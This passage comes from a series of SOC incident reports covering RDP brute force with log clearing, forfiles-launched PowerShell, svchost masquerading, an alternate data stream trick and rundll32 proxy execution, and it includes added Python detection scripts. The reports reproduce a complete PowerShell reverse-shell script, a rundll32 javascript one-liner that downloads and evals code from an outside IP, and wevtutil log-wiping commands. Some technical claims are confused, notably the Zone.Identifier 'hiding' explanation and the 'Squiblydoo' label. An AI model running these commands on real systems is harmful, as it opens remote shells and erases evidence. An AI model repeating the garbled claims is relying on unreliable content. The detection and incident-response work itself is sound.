Username: jwilson (standard user)
Password: Winter2024! (weak, reused)
Privileges: Remote Desktop Users group only
Caveat: clearing the Security log requires administrative rights on the host, so either jwilson held local administrator rights on SEC-SRV-045 or a privilege escalation step was not captured; the SubjectUserName on the forwarded 1102 and 104 events should be checked against this.
Attacker Actions Before Log Clearing:
Enumerated users and groups
Checked running processes
No data exfiltration attempted
Log Recovery:
Local logs cleared (Security, System, PowerShell)
Forwarded logs preserved in Splunk
Complete attack timeline recovered
3. Investigation Findings:
Timeline:
16:20-16:23 – Brute force attempts
16:23 – Successful login
16:24 – Log clearing
16:30 – Alert triggers
16:32 – SOC investigates
16:35 – Host isolated
16:36 – jwilson account disabled
Indicators of Compromise (IoCs):
Network:
– Attacker IP: 45.134.225[.]78
Account:
– jwilson (compromised)
Commands:
– wevtutil cl Security
– wevtutil cl System
– wevtutil cl "Windows PowerShell"
4. Containment Actions:
Immediate Actions:
Isolated compromised host.
Disabled jwilson account.
Blocked attacker IP at firewall.
Terminated any active sessions.
Account Remediation:
Reset jwilson password.
Enforced MFA.
Removed from Remote Desktop Users group (unnecessary).
Host Remediation:
Full scan (no malware found).
Verified no persistence installed.
No reimage needed.
5. Root Cause Analysis:
Primary Cause: Weak password on user account (Winter2024!).
Contributing Factors:
Password policy allowed weak passwords.
RDP exposed to internet (should be VPN only).
User had unnecessary RDP access.
6. Business Impact:
Operational Impact: Security server offline for 1 hour.
Data Exposure: None (attacker interrupted).
Forensic Value: Logs preserved via Splunk.
7. Remediation & Prevention:
Completed Actions:
Host secured.
Account remediated.
Attacker blocked.
Technical Controls Enhanced:
Enforced strong password policy.
Moved RDP behind VPN only.
Enhanced monitoring for log clearing events.
8. Conclusion:
An attacker performed RDP brute force, successfully logged in using a weak password, and attempted to cover tracks by clearing security logs. Splunk’s forwarded logs preserved the full attack timeline. The host was isolated, and the account secured before any data exfiltration.
Closure Rationale: Logs recovered; account secured; attacker blocked.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 17:30 EST
60. T1202 – Indirect Command Execution (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-INDIRECT-1202-7842
Alert Time: 2024-02-19 10:30:15 EST
Severity: HIGH (82/100)
Source: Sysmon (Event ID 1 – Process Creation)
Rule: “Indirect Command Execution via Forfiles.exe”
MITRE ATT&CK: T1202 – Indirect Command Execution
Alert Details:
Event ID: 1 (Process Creation)
Time: 10:25 EST
Host: ENG-WS-034 (Engineering Workstation)
User: rpatel (Raj Patel, Engineer)
Process Tree:
```
explorer.exe (PID: 2341)
  cmd.exe (PID: 4789)
    forfiles.exe (PID: 4792)
      Command: forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA=="
```
Detection Logic:
forfiles.exe used to execute command (indirect execution)
Command executes PowerShell with encoded reverse shell
forfiles.exe is a trusted Windows binary (living off the land)
Pattern matches attacker technique to bypass AppLocker
Decoded PowerShell Command (the encoded string captured in the event decodes to only the first statement below; the command-line field was truncated at capture, and the full reverse-shell script is as reconstructed by the SOC):
```powershell
$client = New-Object System.Net.Sockets.TCPClient('192.168.34.56',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
```
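The decoding step the SOC performed in CyberChef, as an added example that is not part of the original report: the captured command line is unwrapped from the forfiles /c argument, the -EncodedCommand value (base64 over UTF-16LE, accepted by powershell.exe under any prefix of the switch name and the -ec alias) is decoded, and the text is scanned for reverse-shell and download-cradle indicators. The command line and encoded string are the ones on the page; note that the string decodes to only the first statement of the shell, which the example preserves rather than papers over. The indicator list is an assumption chosen for this example.

```python
"""Decode a PowerShell -EncodedCommand launched through forfiles.exe and flag reverse-shell indicators."""
import base64
import re

# The command line as captured in the Sysmon event on the page (the encoded value is truncated
# to the first statement of the reverse shell; that is how it appears in the event).
SAMPLE_CMDLINE = (
    r'forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c powershell -WindowStyle Hidden -EncodedCommand '
    "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMA"
    'LgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQA5ADIALgAxADYAOAAuADMANAAuADUANgAnACwANAA0ADMAKQA7AA=="'
)

# Assumed indicator set for this example.
INDICATORS = [
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("reverse-shell-socket", re.compile(r"Net\.Sockets\.TCPClient", re.I)),
    ("command-eval", re.compile(r"\biex\b|Invoke-Expression", re.I)),
    ("download-cradle", re.compile(r"DownloadString|DownloadFile|DownloadData|Invoke-WebRequest|\biwr\b", re.I)),
]


def is_encoded_flag(token):
    """powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus the -ec alias."""
    if token[:1] not in ("-", "/"):
        return False
    t = token.lstrip("-/").lower()
    return t == "ec" or (bool(t) and "encodedcommand".startswith(t))


def decode_encoded_command(b64):
    """-EncodedCommand payloads are base64 over UTF-16LE; restore padding the attacker may drop."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def analyze(cmdline):
    result = {"lolbin": None, "inner": cmdline, "decoded": None, "indicators": [], "c2": None}
    if re.match(r'^\s*"?(?:[^\s"]*\\)?forfiles(?:\.exe)?"?(?=\s|$)', cmdline, re.I):
        result["lolbin"] = "forfiles"
        m = re.search(r'/c\s+"([^"]*)"', cmdline, re.I)  # the /c argument is what actually runs
        if m:
            result["inner"] = m.group(1)
    tokens = result["inner"].split()
    for flag, value in zip(tokens, tokens[1:]):
        if is_encoded_flag(flag) and re.fullmatch(r"[A-Za-z0-9+/=]+", value):
            result["decoded"] = decode_encoded_command(value)
            break
    text = result["inner"] + "\n" + (result["decoded"] or "")
    result["indicators"] = [name for name, rx in INDICATORS if rx.search(text)]
    m = re.search(r"TCPClient\(\s*['\"]([\d.]+)['\"]\s*,\s*(\d+)\s*\)", text)
    if m:
        result["c2"] = (m.group(1), int(m.group(2)))
    return result


if __name__ == "__main__":
    r = analyze(SAMPLE_CMDLINE)
    print(r["lolbin"], r["c2"], r["indicators"])
    print(r["decoded"])
```

Matching the switch by prefix rather than by the literal string -EncodedCommand matters in practice: detections that look for the full switch name are trivially evaded with -enc or -ec, both of which powershell.exe accepts.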
Additional Context:
forfiles.exe used to indirectly execute PowerShell
C2 IP: 192.168.34.56 (internal)
User rpatel had previously clicked phishing link
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed indirect command execution via forfiles |
| 2. Command Decoding | Decode PowerShell | CyberChef | Reverse shell to 192.168.34.56:443 |
| 3. Process Investigation | Identify source of command | CrowdStrike | Malicious script downloaded earlier |
| 4. Immediate Action | Terminate reverse shell | CrowdStrike | PowerShell process killed |
| 5. C2 Investigation | Identify 192.168.34.56 | CMDB, CrowdStrike | Internal engineering host (already compromised) |
| 6. Host Isolation | Isolate both hosts | CrowdStrike | Both hosts quarantined |
Jira Incident Report
Ticket: SOC-2024-100
Summary: T1202 – Indirect Command Execution via Forfiles.exe for Reverse Shell
Status: RESOLVED
Resolution: MALICIOUS – Reverse Shell Terminated
Priority: P2 – MEDIUM
Labels: T1202, indirect-command, forfiles, lolbin, sysmon, reverse-shell
Components: Endpoint-Security, Defense-Evasion
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 1 (Process Creation).
Alert: “Indirect Command Execution via Forfiles.exe”.
Host: ENG-WS-034 (Engineering Department, user rpatel).
Time: 2024-02-19 10:30 EST.
Technique: MITRE ATT&CK T1202 – Indirect Command Execution.
2. Technical Analysis:
Attack Chain:
09:45 – User clicked phishing link in email
09:46 – PowerShell downloaded and executed initial script
09:47 – Script downloaded Cobalt Strike beacon
09:48 – Beacon injected into svchost.exe
09:50 – Attacker used beacon to launch indirect command
10:25 – forfiles.exe executed with malicious command
10:25 – PowerShell reverse shell to internal C2
10:30 – Sysmon detects
Indirect Execution Technique:
Binary: forfiles.exe (legitimate Windows tool)
Purpose: Normally used to run a command against each file matching a path and name filter
Abuse: /c parameter executes an arbitrary command once per matched file (the filter /m notepad.exe in System32 guarantees exactly one match, so the payload runs exactly once)
Why: Evades controls keyed on the parent process or on the launching shell's command line; AppLocker still evaluates the child powershell.exe, so this only defeats application control where PowerShell itself is allowed
Command: Launches encoded PowerShell reverse shell
C2 Infrastructure:
Internal C2: 192.168.34.56:443 (ENG-WS-089)
External C2: 185.143.221[.]89 (from engineering host logs)
Chain: ENG-WS-034 -> ENG-WS-089 -> External
Reverse Shell Capabilities:
Interactive PowerShell session
Full command execution
File upload/download
No data exfiltration before termination
3. Investigation Findings:
Timeline:
09:45 – Phishing email opened
09:46-09:48 – Malware installation
10:25 – Indirect command execution
10:30 – Sysmon alert
10:32 – SOC investigates
10:35 – Reverse shell terminated
10:36 – Both hosts isolated
Indicators of Compromise (IoCs):
Process:
– forfiles.exe /p C:\Windows\System32 /m notepad.exe /c "cmd /c powershell -WindowStyle Hidden -EncodedCommand JABjAGwAaQ…
Network:
– Internal C2: 192.168.34.56:443
– External C2: 185.143.221[.]89
Files:
– Initial dropper (SHA256: a1b2c3d4…)
4. Containment Actions:
Immediate Actions:
Terminated reverse shell process.
Isolated ENG-WS-034.
Isolated ENG-WS-089 (C2 host).
Blocked external C2 at firewall.
Malware Removal:
Removed injected code from svchost.exe on both hosts.
Deleted malicious files.
Full scans (clean).
User Remediation:
Password reset for rpatel.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
AppLocker allowed forfiles.exe (legitimate binary).
PowerShell allowed to execute.
No monitoring for LOLBin abuse.
6. Business Impact:
Operational Impact: Two engineering workstations offline for 2 hours.
Data Exposure: None (C2 contained).
7. Remediation & Prevention:
Completed Actions:
Reverse shell terminated.
Malware removed.
Hosts secured.
C2 blocked.
Technical Controls Enhanced:
Created Sysmon rule for forfiles.exe with suspicious command lines.
Enhanced monitoring for LOLBin abuse.
Restricted PowerShell execution policy (note: execution policy is not a security boundary and does not apply to -EncodedCommand; Constrained Language Mode and AppLocker/WDAC script rules are the controls that actually constrain this).
8. Conclusion:
An attacker used forfiles.exe, a legitimate Windows binary, to indirectly execute a PowerShell reverse shell, sidestepping parent-process and command-line based controls. Sysmon detected the anomalous process execution, enabling rapid termination. The reverse shell was active for roughly 10 minutes (10:25 to 10:35) before containment.
Closure Rationale: Reverse shell terminated; malware removed; LOLBin monitoring enhanced.
Analyst: [Walter White], SOC Analyst Date: 2024-02-19 11:30 EST
Batch 13: Defense Evasion & Credential Access Incident Reports
61. T1036 – Masquerading (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-MASQUERADE-1036-7842
Alert Time: 2024-02-20 09:30:22 EST
Severity: HIGH (85/100)
Source: CrowdStrike Falcon EDR
Rule: “Process Masquerading – Suspicious Path for System Binary”
MITRE ATT&CK: T1036.005 – Masquerading: Match Legitimate Name or Location
Alert Details:
Detection: Process with system binary name running from non-standard path
Host: FIN-WS-045 (Finance Department)
User: bturner (Brian Turner, Accountant)
Time: 09:25 EST
Process Details:
Process Name: svchost.exe
Process Path: C:\Users\bturner\AppData\Local\Temp\svchost.exe
Expected Path: C:\Windows\System32\svchost.exe
PID: 4789
Parent Process: explorer.exe (legitimate svchost.exe instances are started by services.exe; a user-shell parent is itself an indicator)
Command Line: “C:\Users\bturner\AppData\Local\Temp\svchost.exe” -k netsvcs
File Details:
SHA256: a1b2c3d4e5f67890a1b2c3d4e5f67890a1b2c3d4 (placeholder/truncated value; a full SHA-256 digest is 64 hex characters)
File Size: 156 KB
Digital Signature: None (legitimate svchost.exe is signed by Microsoft)
Creation Time: 09:20 EST
Behavior Analysis:
Process attempted to connect to 185.143.221[.]89:443
Process attempted to access lsass.exe (PID: 568) – ACCESS DENIED
Process created child process: powershell.exe (encoded command)
Detection Logic:
Process name matches legitimate system binary (svchost.exe)
Process running from user-writable path (Temp)
No digital signature (expected signed by Microsoft)
Anomalous behavior (network, lsass access)
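The path, signature and parent checks in the detection logic above, as an added example that is not part of the original alert or of CrowdStrike's logic: a small table of commonly impersonated Windows binaries records where each lives and what starts it, and a process record is scored against it. The expected directories, parents and signer names describe a default Windows install and are assumptions for this example; the two sample records are constructed from the alert (the Temp-folder svchost.exe) and from a legitimate service host.

```python
"""Path, signer and parent checks for processes named like Windows system binaries."""
from pathlib import PureWindowsPath

# Expected install directory and parent process for a few commonly impersonated binaries.
# Assumptions describing a default Windows 10/11 install.
KNOWN_SYSTEM_BINARIES = {
    "svchost.exe": {"dirs": {"c:\\windows\\system32", "c:\\windows\\syswow64"}, "parents": {"services.exe"}},
    "lsass.exe": {"dirs": {"c:\\windows\\system32"}, "parents": {"wininit.exe"}},
    "csrss.exe": {"dirs": {"c:\\windows\\system32"}, "parents": {"smss.exe"}},
    "winlogon.exe": {"dirs": {"c:\\windows\\system32"}, "parents": {"smss.exe"}},
}
# Assumed acceptable signer subjects for Windows system binaries.
MICROSOFT_SIGNERS = {"microsoft windows", "microsoft windows publisher", "microsoft corporation"}

# Constructed process records: the alert's svchost.exe from Temp, and a legitimate service host.
SAMPLE_PROCS = [
    {"image": r"C:\Users\bturner\AppData\Local\Temp\svchost.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Users\bturner\AppData\Local\Temp\svchost.exe" -k netsvcs',
     "signer": None},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "signer": "Microsoft Windows"},
]


def is_user_writable(directory):
    """Coarse test for locations a standard user can write to (assumed list)."""
    d = directory.lower()
    return d.startswith("c:\\users\\") or d.startswith("c:\\programdata\\") or "\\temp" in d


def check_masquerade(proc):
    """Return the masquerading indicators for one process record (empty list = nothing suspicious)."""
    image = PureWindowsPath(proc["image"])
    spec = KNOWN_SYSTEM_BINARIES.get(image.name.lower())
    if spec is None:
        return []  # not a name we hold expectations for
    directory = str(image.parent).lower()
    findings = []
    if directory not in spec["dirs"]:
        findings.append(f"non-standard path: {image.parent}")
    if is_user_writable(directory):
        findings.append("image in a user-writable directory")
    if (proc.get("signer") or "").lower() not in MICROSOFT_SIGNERS:
        findings.append("missing or non-Microsoft signature")
    parent = PureWindowsPath(proc.get("parent_image", "")).name.lower()
    if parent and parent not in spec["parents"]:
        findings.append(f"unexpected parent process: {parent}")
    return findings


if __name__ == "__main__":
    for p in SAMPLE_PROCS:
        print(p["image"], "->", check_masquerade(p) or "clean")
```

The parent check is the one most often left out of path-only rules, yet it catches the variant this rule would miss: a copy dropped into C:\Windows\System32\ by an attacker who already holds admin rights still has explorer.exe or cmd.exe as its parent rather than services.exe.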
Additional Context:
User bturner reported receiving suspicious email with attachment
Attachment opened at 09:15 EST
No legitimate reason for svchost.exe in Temp folder
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|---|---|---|---|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed masquerading svchost.exe from Temp folder |
| 2. File Analysis | Analyze svchost.exe | CrowdStrike Sandbox | Malicious executable (Cobalt Strike loader) |
| 3. Process Investigation | Terminate malicious process | CrowdStrike | Process killed |
| 4. File Removal | Delete svchost.exe | CrowdStrike Live Response | File deleted |
| 5. User Interview | Contact user | Teams, Phone | User opened “invoice.doc” from email |
| 6. Email Investigation | Find source email | Proofpoint, Exchange | Email quarantined; attachment malicious |
Jira Incident Report
Ticket: SOC-2024-101
Summary: T1036 – Masquerading svchost.exe Running from Temp Folder
Status: RESOLVED
Resolution: MALICIOUS – Process Terminated
Priority: P2 – MEDIUM
Labels: T1036, masquerading, svchost, crowdstrike
Components: Endpoint-Security, Malware-Response
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Process Masquerading – Suspicious Path for System Binary”.
Host: FIN-WS-045 (Finance Department, user bturner).
Process: C:\Users\bturner\AppData\Local\Temp\svchost.exe (masquerading as svchost.exe).
Time: 2024-02-20 09:30 EST.
Technique: MITRE ATT&CK T1036.005 – Masquerading: Match Legitimate Name or Location.
2. Technical Analysis:
Attack Chain:
09:15 – User receives email from “vendor@payment-update[.]net”
09:16 – Email contains attachment “invoice.doc”
09:17 – User opens attachment (enables macros)
09:18 – Macro downloads svchost.exe from 185.143.221[.]89
09:20 – svchost.exe saved to Temp folder
09:21 – User executes file (thinks it’s legitimate)
09:22 – Malicious svchost.exe runs
09:23 – Attempts C2 connection to 185.143.221[.]89:443
09:23 – Attempts LSASS access (blocked by PPL)
09:25 – CrowdStrike alerts
Masquerading Technique:
Binary Name: svchost.exe (legitimate Windows service host)
Expected Path: C:\Windows\System32\svchost.exe
Actual Path: C:\Users\bturner\AppData\Local\Temp\svchost.exe
Signature: None (legitimate svchost.exe is signed by Microsoft)
Purpose: Evade detection by blending in with legitimate processes
Malware Analysis:
Type: Cobalt Strike loader
Capabilities:
Injects into legitimate svchost.exe (after checking path)
Attempts credential dumping (LSASS)
Establishes C2 beaconing
Downloads additional payloads
User Activity:
User expected to open invoice document
Unknowingly executed malware
3. Investigation Findings:
Timeline:
09:15 – Phishing email received
09:17 – Attachment opened
09:18-09:21 – Malware downloaded and executed
09:23 – C2 attempt (blocked)
09:25 – CrowdStrike alert
09:27 – SOC investigates
09:30 – Process terminated, file deleted
Indicators of Compromise (IoCs):
Files:
– C:\Users\bturner\AppData\Local\Temp\svchost.exe (SHA256: a1b2c3d4…)
– invoice.doc (original macro doc) – SHA256: b2c3d4e5…
Network:
– C2: 185.143.221[.]89:443
– Download URL: http://185.143.221[.]89/svchost.exe
Email:
– Sender: vendor@payment-update[.]net
– Subject: “Invoice #7842”
4. Containment Actions:
Immediate Actions:
Terminated malicious svchost.exe process.
Deleted file from Temp folder.
Isolated host temporarily.
Blocked C2 IP at firewall.
Host Remediation:
Full scan (no other malware).
Verified no persistence installed.
No reimage needed.
User Remediation:
Password reset.
Phishing training assigned.
Reported email to security team.
5. Root Cause Analysis:
Primary Cause: User opened malicious macro-enabled document.
Contributing Factors:
Macros enabled in Office.
No ASR rule blocking Office child processes.
User lacked recent phishing training.
6. Business Impact:
Operational Impact: Finance workstation offline for 1 hour.
Data Exposure: None (C2 blocked, LSASS access denied).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
File deleted.
User educated.
C2 blocked.
Technical Controls Enhanced:
Enabled ASR rule “Block Office applications from creating child processes”.
Blocked macros from internet via GPO.
Created alert for any system binary running from non-standard path.
8. Conclusion:
A user opened a phishing email with a macro-enabled document that downloaded and executed a malicious executable masquerading as svchost.exe. CrowdStrike detected the process running from an anomalous path, enabling rapid termination before significant C2 activity.
Closure Rationale: Malicious process terminated; file deleted; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-20 10:30 EST
62. T1564 – Hide Artifacts (Sysmon Detection)
Sysmon Alert Details
Alert ID: SYSMON-HIDE-ARTIFACTS-1564-7842
Alert Time: 2024-02-20 14:15:33 EST
Severity: HIGH (82/100)
Source: Sysmon (Event ID 15 – FileCreateStreamHash, raised when an alternate data stream is created)
Rule: “NTFS Alternate Data Stream Created – Potential Hidden Data”
MITRE ATT&CK: T1564.004 – Hide Artifacts: NTFS File Attributes
Alert Details:
Event ID: 15 (FileCreateStreamHash – alternate data stream created)
Time: 14:10 EST
Host: DEV-WS-112 (Development Workstation)
User: alexchen (Alex Chen, Developer)
File: C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask
Stream Name: Zone.Identifier
Stream Size: 26 bytes
Additional Sysmon Events:
Event ID 11 (File Create):
Time: 14:09 EST
Path: C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask
Process: powershell.exe (PID: 4789)
Command: Out-File -FilePath C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask -Stream Zone.Identifier -Value “[ZoneTransfer]`nZoneId=3”
Event ID 1 (Process Creation):
Time: 14:08 EST
Process: powershell.exe
Command: powershell -Command "Add-Content -Path C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask -Stream Zone.Identifier -Value '[ZoneTransfer]`nZoneId=3'"
Detection Logic:
Alternate Data Stream (ADS) created on a system file
ADS used to hide data (Zone.Identifier marks file as downloaded from internet)
File path is legitimate Windows Update task location
Process using ADS to hide origin of file
Technique used to evade security tools that don’t scan ADS
Additional Context:
File UpdateTask is actually a malicious scheduled task XML
Hidden ADS used to mark it as “safe” (ZoneId=3 means internet)
Scheduled task created earlier by malware
ADS hides the fact that file came from internet
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify Sysmon events | Splunk, Sysmon Logs | Confirmed ADS creation on scheduled task file |
| 2. File Analysis | Examine UpdateTask file | PowerShell, Notepad | Malicious scheduled task XML (runs PowerShell) |
| 3. Scheduled Task Check | List tasks | schtasks, PowerShell | Malicious task “WindowsUpdateTask” found |
| 4. Immediate Action | Disable and delete task | schtasks /delete | Task removed |
| 5. ADS Removal | Remove ADS stream | powershell Remove-Item -Stream | ADS deleted |
| 6. Threat Hunting | Check for other ADS | Sysmon, Splunk | No other suspicious ADS found |
Jira Incident Report
Ticket: SOC-2024-102
Summary: T1564 – Malicious Scheduled Task Hidden via Alternate Data Stream
Status: RESOLVED
Resolution: MALICIOUS – Artifact Removed
Priority: P2 – MEDIUM
Labels: T1564, hide-artifacts, ads, alternate-data-stream, sysmon
Components: Endpoint-Security, Persistence
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: Sysmon Event ID 15 (Alternate Data Stream Created).
Alert: “NTFS Alternate Data Stream Created – Potential Hidden Data”.
Host: DEV-WS-112 (Development Department, user alexchen).
File: C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask (Zone.Identifier stream).
Time: 2024-02-20 14:15 EST.
Technique: MITRE ATT&CK T1564.004 – Hide Artifacts: NTFS File Attributes.
2. Technical Analysis:
Attack Chain:
13:45 – User clicked phishing link
13:46 – Malware downloaded
13:50 – Malware created scheduled task XML file (UpdateTask)
13:51 – Malware used PowerShell to add Zone.Identifier ADS
13:52 – ADS marks file as “downloaded from internet” (ZoneId=3)
13:53 – Malware registers scheduled task using schtasks
14:08 – PowerShell executed to create ADS (detected)
14:10 – Sysmon alerts
Scheduled Task Details:
Task Name: WindowsUpdateTask (masquerading)
Task XML Location: C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask
Trigger: Daily at 3 AM
Action: PowerShell encoded reverse shell
Hidden via: ADS (Zone.Identifier) to avoid suspicion
ADS Technique:
Stream: Zone.Identifier
Purpose: Indicates file originated from internet zone
Abuse: Malware adds this stream to make file appear legitimate
Evasion: Many security tools ignore ADS when scanning
User Activity:
User clicked link in email about “security update”
Unaware of malware installation
3. Investigation Findings:
Timeline:
13:45 – Phishing link clicked
13:50-13:53 – Scheduled task created
14:08 – ADS added
14:10 – Sysmon alert
14:15 – SOC investigates
14:18 – Task deleted, ADS removed
Indicators of Compromise (IoCs):
Files:
– C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\UpdateTask (with ADS)
Scheduled Task:
– Name: WindowsUpdateTask
– Action: PowerShell reverse shell
Network:
– C2: 185.143.221[.]89:443
4. Containment Actions:
Immediate Actions:
Deleted malicious scheduled task.
Removed ADS stream from file.
Deleted the task XML file.
Isolated host temporarily.
Host Remediation:
Full scan (no other malware).
Verified no other ADS present.
User Remediation:
Password reset.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link, leading to malware.
Contributing Factors:
No ASR rule blocking scheduled task creation.
ADS not monitored (until Sysmon).
6. Business Impact:
Operational Impact: Developer workstation offline for 1 hour.
Data Exposure: None.
7. Remediation & Prevention:
Completed Actions:
Malicious task removed.
ADS deleted.
User educated.
Technical Controls Enhanced:
Created Sysmon rule for ADS creation on system directories.
Enhanced scheduled task monitoring.
Enabled scanning of ADS in antivirus.
8. Conclusion:
Attackers used an Alternate Data Stream to hide the origin of a malicious scheduled task file. Sysmon detected the ADS creation, leading to discovery and removal of the hidden persistence mechanism.
Closure Rationale: Malicious task removed; ADS deleted; controls enhanced.
Analyst: [Walter White], SOC Analyst
Date: 2024-02-20 15:30 EST
63. T1218 – System Binary Proxy Execution (CrowdStrike Detection)
CrowdStrike Alert Details
Alert ID: CS-RUNDLL32-1218-7842
Alert Time: 2024-02-20 11:30:22 EST
Severity: HIGH (88/100)
Source: CrowdStrike Falcon EDR
Rule: “Suspicious Rundll32 Execution – No Command Line Arguments”
MITRE ATT&CK: T1218.011 – System Binary Proxy Execution: Rundll32
Alert Details:
Detection: Rundll32.exe executed with suspicious parameters
Host: MKT-WS-078 (Marketing Department)
User: sjones (Sarah Jones, Marketing Manager)
Time: 11:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
rundll32.exe (PID: 4792)
Command Line: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://185.143.221[.]89/payload",false);h.Send();eval(h.responseText)
Detection Logic:
Rundll32.exe executing JavaScript code (unusual)
JavaScript downloads and executes payload from remote URL
No legitimate rundll32 use case for this behavior
Pattern matches known “Squiblydoo” attack technique
Additional Context:
User sjones reported receiving email with “important document” link
Clicked link at 11:20 EST
No legitimate reason for rundll32 to run JavaScript
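The rundll32 checks above can be written as a command-line analyser that a SOC runs over process-creation telemetry. This is an added example, not the report's or CrowdStrike's code: the pattern list and the "normal form" of a benign call are assumptions, and the sample command lines are constructed (the first mirrors the alert's command with the real IP replaced by the documentation address 203.0.113.10).

```python
"""Score rundll32.exe command lines for proxy-execution abuse (T1218.011).

Added illustration; not code from the incident report or from CrowdStrike. The pattern
list, the "normal form" of a benign call and the sample command lines are constructed;
the first sample mirrors the alert's command with the real IP replaced by a documentation
address (203.0.113.10).
"""
from __future__ import annotations

import re

# Each pattern is one reason the arguments are not a plain "<dll>,<EntryPoint>" call.
SUSPICIOUS_ARG_PATTERNS = [
    (re.compile(r"\bjavascript:", re.I), "javascript: protocol handler in arguments"),
    (re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.I), "mshtml RunHTMLApplication script proxy"),
    (re.compile(r"ActiveXObject|WinHttpRequest|XMLHTTP", re.I), "scriptable HTTP/COM object"),
    (re.compile(r"https?://", re.I), "remote URL in arguments"),
]
# Assumption: a benign invocation names a .dll/.cpl (optionally quoted) and an entry point.
NORMAL_FORM = re.compile(r'^("[^"]+\.(dll|cpl)"|\S+\.(dll|cpl))(,\S+)?(\s|$)', re.I)


def split_image(cmdline: str) -> tuple[str, str]:
    """Return (image basename, lower-cased; remaining argument string)."""
    s = cmdline.strip()
    if not s:
        return "", ""
    if s.startswith('"'):
        end = s.find('"', 1)
        image, rest = (s[1:end], s[end + 1:]) if end != -1 else (s[1:], "")
    else:
        parts = s.split(None, 1)
        image, rest = parts[0], (parts[1] if len(parts) > 1 else "")
    return image.rsplit("\\", 1)[-1].lower(), rest.strip()


def analyze_rundll32(cmdline: str) -> list[str]:
    """Return the reasons a rundll32 command line is suspicious; [] for non-rundll32 or benign."""
    image, args = split_image(cmdline)
    if image != "rundll32.exe":
        return []
    if not args:
        return ["no arguments (rundll32 has nothing legitimate to do)"]
    reasons = [why for pattern, why in SUSPICIOUS_ARG_PATTERNS if pattern.search(args)]
    if not reasons and not NORMAL_FORM.match(args):
        reasons.append("arguments do not name a DLL/CPL entry point")
    return reasons


# Constructed sample command lines (the first reproduces the alert's pattern).
SAMPLE_COMMAND_LINES = [
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://203.0.113.10/payload",false);h.Send();eval(h.responseText)',
    r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
    r'"C:\Windows\System32\rundll32.exe"',
    r"notepad.exe C:\Users\sjones\report.txt",
]

if __name__ == "__main__":
    for c in SAMPLE_COMMAND_LINES:
        print(analyze_rundll32(c) or "benign", "<-", c[:60])
```

The "no arguments" branch matches the rule name in the alert header, while the argument patterns match the command actually captured; a production rule needs both, because either shape on its own is a gap.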
SOC Investigation Process
| Step | Action | Tools Used | Findings |
|------|--------|------------|----------|
| 1. Alert Validation | Verify CrowdStrike alert | CrowdStrike Falcon Console | Confirmed suspicious rundll32 JavaScript execution |
| 2. URL Analysis | Analyze payload URL | URLScan.io, VirusTotal | Payload URL hosts Cobalt Strike beacon |
| 3. Process Investigation | Terminate rundll32 process | CrowdStrike | Process killed |
| 4. Network Block | Block malicious URL | Zscaler, Palo Alto | URL blocked |
